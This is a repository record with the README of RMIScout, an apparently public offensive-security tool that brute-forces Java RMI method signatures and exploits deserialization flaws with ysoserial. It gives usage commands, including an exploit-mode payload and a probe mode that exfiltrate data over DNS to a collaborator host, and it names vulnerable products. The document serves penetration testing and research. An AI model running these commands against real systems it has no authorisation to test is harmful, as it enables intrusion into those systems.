{"id":13510086,"url":"https://github.com/BishopFox/rmiscout","last_synced_at":"2025-03-30T15:30:37.213Z","repository":{"id":79092038,"uuid":"256329590","full_name":"BishopFox/rmiscout","owner":"BishopFox","description":"RMIScout uses wordlist and bruteforce strategies to enumerate Java RMI functions and exploit RMI parameter unmarshalling vulnerabilities","archived":false,"fork":false,"pushed_at":"2022-09-07T19:06:38.000Z","size":6199,"stargazers_count":429,"open_issues_count":7,"forks_count":60,"subscribers_count":15,"default_branch":"master","last_synced_at":"2025-03-29T23:11:42.171Z","etag":null,"topics":["java","java-deserialization","java-rmi","javassist","offensive-security","scanner","security-tools"],"latest_commit_sha":null,"homepage":"https://labs.bishopfox.com/tech-blog/rmiscout","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BishopFox.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2020-04-16T21:04:31.000Z","updated_at":"2025-03-24T16:41:55.000Z","dependencies_parsed_at":"2023-07-05T18:18:22.737Z","dependency_job_id":null,"html_url":"https://github.com/BishopFox/rmiscout","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BishopFox%2Frmiscout","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BishopFox%2Frmiscout/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BishopFox%2Frmiscout/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BishopFox%2Frmiscout/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BishopFox","download_url":"https://codeload.github.com/BishopFox/rmiscout/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246338641,"owners_count":20761412,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["java","java-deserialization","java-rmi","javassist","offensive-security","scanner","security-tools"],"created_at":"2024-08-01T02:01:23.573Z","updated_at":"2025-03-30T15:30:37.177Z","avatar_url":"https://github.com/BishopFox.png","language":"Java","readme":"\u003cp align=\"center\"\u003e\n  \u003cimg src=\"assets/RMIScout.png\" width=600/\u003e\n\u003c/p\u003e\n\n#\n\n\n\n![License](https://img.shields.io/badge/license-MIT-lightgrey.svg)\n![Python version](https://img.shields.io/badge/java-8-blue.svg)\n\n### Description\n\nRMIScout enables wordlist and bruteforce attacks against exposed Java RMI interfaces to safely guess method signatures without invocation. It supports multiple Java RMI protocols, method invocation, and exploitation.\n\n### Feature overview\n\n* Supports multiple types of Java RMI servers:\n\t* RMI-JRMP (AKA plain RMI; usually port 1099): Remote object registry service (rmiregistry)\n\t* [RMI Activation Stubs via rmid](https://docs.oracle.com/javase/7/docs/technotes/guides/rmi/activation/overview.html)\n\t* [RMI-IIOP: Java CORBA programming model (orbd; usually port 1050)](https://en.wikipedia.org/wiki/RMI-IIOP)\n\t\t* IIOP requires JRE 1.8 to use. Due to deprecation in later runtimes.\n\t* RMI-SSL\n* Multiple modes of operation\n\t* **wordlist mode:** Test for remote methods using a wordlist of signatures (see included lists/prototypes.txt)\n\t* **bruteforce mode:** Given a wordlist of method names generate signatures with various parameter types, # of params, and return types.\n\t* **exploit mode:** Use ysoserial to exploit remote methods with non-primitive parameters.\n\t\t* Requires rmiscout to be run with JRE 1.8 for ysoserial to work properly.\n\t* **probe mode:** Use [GadgetProbe](https://github.com/bishopfox/gadgetprobe) to identify classes in the remote classpath\n\t* **invoke mode:** Directly invoke remote methods by specifying a method signature and parameter values from the command line (primitives, arrays, and Strings only).\n\t* **list mode:** List available registries on remote server.\n* Automatically switches between RMI, RMI-SSL, Activation stubs.\n* Automatically performs localhost bypass techniques (e.g., registries bound to @127.0.0.1:XXXX, but still externally exposed via XXXX)\n\n\n### How it works\n\nTo identify but not execute RMI functions, RMIScout uses low-level RMI network functions and dynamic class generation to send RMI invocations with deliberately mismatched types to trigger remote exceptions. All parameters are substituted for a dynamically generated serializable class with a 255-character name assumed to not exist in the remote class path. For example:\n\nRemote Interface:\n```\nvoid login(String user, String password)\n```\nRMIScout will invoke:\n```\nlogin((String) new QQkzkn3..255 chars..(), (String) new QQkzkn3..255 chars..())\n```\nIf the class is present this will result in a remote `java.rmi.UnmarshalException` cased by the `ClassNotFoundException` or argument unmarshalling error without invoking the underlying method.\n\nFor more detailed technical writeups:\n* [(Original Writeup) RMIScout: Safely and Quickly Brute-Force Java RMI Interfaces for Code Execution](https://know.bishopfox.com/research/rmiscout).\n* [(RMIScout Update) Lessons Learned on Brute Forcing RMI-IIOP with RMIScout](https://labs.bishopfox.com/tech-blog/lessons-learned-on-brute-forcing-rmi-iiop-with-rmiscout)\n\n\n### Modes of operation\n\n\n#### Wordlist mode\n```\n./rmiscout.sh wordlist -i lists/prototypes.txt \u003chost\u003e \u003cport\u003e\n```\nSupply a wordlist of method prototypes to check for on the remote server. RMIScout will output all identified matches.\n\n*For RMI-IIOP/CORBA*: Unless methods are overloaded, brute forcing and invocation only require names to match (all other information is ignored).\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"assets/rmiscout_wordlist.gif\" width=800/\u003e\n\u003c/p\u003e\n\n#### Bruteforce mode\n```\n./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 \u003chost\u003e \u003cport\u003e\n```\n\nSupply a wordlist of candidate method names, then provide a comma-delimited list of candidate return types, number range of parameters, and candidate parameter types. Bruteforce mode will generate the permutations and look for matching signatures.\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"assets/rmiscout_bruteforce.gif\" width=800/\u003e\n\u003c/p\u003e\n\n#### Exploit mode\n```\n./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' -p ysoserial.payloads.URLDNS -c \"http://examplesubdomain.burpcollaborator.net\" -n registryName \u003chost\u003e \u003cport\u003e\n```\nOn misconfigured servers, any known RMI signature using non-primitive types (e.g., `java.util.List`), can be exploited by replacing the object with a serialized payload. This is a fairly common misconfiguration (e.g., VMWare vSphere Data Protection + vRealize Operations Manager, Pivotal tc Server and Gemfire, Apache Karaf + Cassandra)  as highlighted in  [An Trinh's 2019 Blackhat EU talk](https://i.blackhat.com/eu-19/Wednesday/eu-19-An-Far-Sides-Of-Java-Remote-Protocols.pdf).\n\nRMIScout integrates with [ysoserial](https://github.com/frohoff/ysoserial/) to perform deserialization attacks against services incorrectly configuring process-wide serialization filters ([JEP 290](https://openjdk.java.net/jeps/290)).\n\nExamples of exploitable signatures:\n```\nvoid exampleMethod(java.util.Map a) // Any non-primitive types\nvoid exampleMethod(float[] a) // Any type of array, even primitives\nvoid exampleMethod(String a) // Works on older JDKs, see below...\n```\n*Note:* Signatures containing `java.lang.String` types are only exploitable in JRE 8/11/13/14 releases prior to early 2020 in RMI-JRMP, but are still currently exploitable in RMI-IIOP.\n\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"assets/rmiscout_exploit.gif\" width=800/\u003e\n\u003c/p\u003e\n\n#### Invoke mode\n```\n./rmiscout.sh invoke -p 1 -p 4 -s 'int add(int a, int b)' \u003chost\u003e \u003cport\u003e\n./rmiscout.sh invoke -p 1,2,3,4 -s 'int addList(int[] a)' \u003chost\u003e \u003cport\u003e\n```\nRMIScout let's you invoke any signatures with primitives, primitive arrays, or Strings. More advanced types will require writing a custom client.\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"assets/rmiscout_invoke.gif\" width=800/\u003e\n\u003c/p\u003e\n\n#### Probe mode\n```\n./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ../GadgetProbe/wordlists/maven_popular.list -d \"examplesubdomain.burpcollaborator.net\" -n registryName \u003chost\u003e \u003cport\u003e\n```\nRMIScout integrates with [GadgetProbe](https://github.com/bishopfox/gadgetprobe) to identify classes in the remote classpath. Class names are exfiltrated via DNS.\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"assets/rmiscout_probe.gif\" width=800/\u003e\n\u003c/p\u003e\n\n### Building and Running\n\nUse the included `rmiscout.sh` script to automatically build the project and as a convenient wrapper around `java -jar` syntax:\n```bash\n./rmiscout.sh wordlist -i lists/prototypes.txt \u003chost\u003e \u003cport\u003e\n```\n\nAlternatively, build the project manually and use traditional `java -jar` syntax:\n\n```bash\n# Manually build JAR\n./gradlew shadowJar\n\njava -jar build/libs/rmiscout-1.4-SNAPSHOT-all.jar wordlist -i lists/prototypes.txt \u003chost\u003e \u003cport\u003e\n```\n\n**Note:** RMI-IIOP (compile/runtime) and ysoserial (runtime) depend on JDK8.\n\n### Try It out\nRun the dockerized demo RMI server. Try out the included `demo/wordlist.txt`.\n```bash\ncd demo\n./start_demo.sh\n```\n\n### Troubleshooting\n\nQ: How can I tell if `\u003chost\u003e:\u003cport\u003e` an RMI Registry?\n\nUse `./rmiscout list \u003chost\u003e \u003cport\u003e` to get information about registries on a remote server.\n```./rmiscout.sh list 127.0.0.1 1099\n[INFO] Registries available on 127.0.0.1:1099 = [ActivationServer:com.bishopfox.example.ActivationImpl_Stub, plaintest:com.bishopfox.example.HelloInterface]\n```\nOr, use nmap's `rmi-dumpregistry` script:\n\n```\nnmap --script rmi-dumpregistry 172.17.0.1 -p 1099 -Pn\n\nPORT     STATE SERVICE\n1099/tcp open  rmiregistry\n| rmi-dumpregistry:\n|   ActivationServer\n|     com.bishopfox.example.ActivationImpl_Stub\n|     \\x00\\x0EActivatableRef\n|     extends\n|       java.rmi.server.RemoteStub\n|       extends\n|         java.rmi.server.RemoteObject\n|   plaintest\n|      implements com.bishopfox.example.HelloInterface,\n|     extends\n|       java.lang.reflect.Proxy\n|       fields\n|           Ljava/lang/reflect/InvocationHandler; h\n|             java.rmi.server.RemoteObjectInvocationHandler\n|             @127.0.0.1:1111\n|             extends\n|_              java.rmi.server.RemoteObject\n```\n\nQ: I found a registry on port 1098 with the name `java.rmi.activation.ActivationSystem`. What can I do with it?\n\nThis is an rmid Activation System Daemon. All of its methods are restricted by the SecurityManager. More recent JREs check if the remote peer originates from localhost before deserializing any remote data. Older (pre 2011) versions did not have this check and may be vulnerable. See [https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb)\n\nQ: Can I run RMIScout with a newer runtime than JRE 8?\n\nA: Technically yes, but a variety of features will stop working. CORBA support, probe support, and ysoserial (exploit mode) mandate a JRE 8 dependency.\n\nQ: Why am I getting a `CannotCompileException`?\n\nA: A `CannotCompileException` occurs when an invalid method name or prototype is supplied directly or via a wordlist. RMIScout generates bytecode for user-supplied candidate signatures at runtime. Although RMIScout has basic rules for correcting common syntax errors in user-supplied prototypes, it will sometimes fail.\n\n### Author\n\nTwitter: [@BumbleSec](https://twitter.com/theBumbleSec)\n\nGitHub: [the-bumble](https://github.com/the-bumble/)\n","funding_links":[],"categories":["Java","Java (504)","security-tools"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBishopFox%2Frmiscout","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FBishopFox%2Frmiscout","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBishopFox%2Frmiscout/lists"}